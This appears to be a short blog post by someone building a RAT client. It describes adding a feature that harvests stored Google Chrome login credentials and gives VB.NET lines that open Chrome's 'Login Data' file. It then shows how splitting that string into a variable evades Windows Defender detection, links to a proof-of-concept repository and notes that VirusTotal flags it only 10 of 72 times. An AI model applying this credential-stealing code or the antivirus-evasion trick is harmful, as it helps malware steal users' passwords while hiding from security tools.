Bypassing Windows Defender by splitting a string

While working on the client for the RAT I discovered a "funny" Windows Defender behavior. I wanted to add a feature that collects stored login information from google chrome. After a quick google search I found a code example to extract these information. Of course this code snippet was a little bit older and detected by Windows Defender while compiling.

After some try and error and found out that this line of code causes the detection:

Dim sqllogin As New SQLiteHandler(GetFolderPath(SpecialFolder.LocalApplicationData) + "\Google\Chrome\User Data\Default\Login Data")

Especially the string "Login Data" causes the detection. By using a variable for the word "Data" no detection will be triggered.

Dim a = "Data"
Dim sqllogin As New SQLiteHandler(GetFolderPath(SpecialFolder.LocalApplicationData) + "\Google\Chrome\User Data\Default\Login " + a)

I uploaded a PoC here: https://github.com/Daniel-itsec/DefenderBypassPoC

However when uploading the poc to virus total it receives 10/72 detections. Not so much I think...


Daniel

Popular Posts